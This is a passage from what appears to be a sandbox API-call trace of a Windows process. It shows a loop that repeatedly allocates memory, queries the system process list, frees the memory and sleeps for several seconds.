Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.499] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.517] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.530] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.547] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.563] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.578] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.593] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.608] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.624] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.643] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.655] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.671] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.687] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.704] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.718] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.733] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.766] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.780] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.801] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.817] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.826] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, 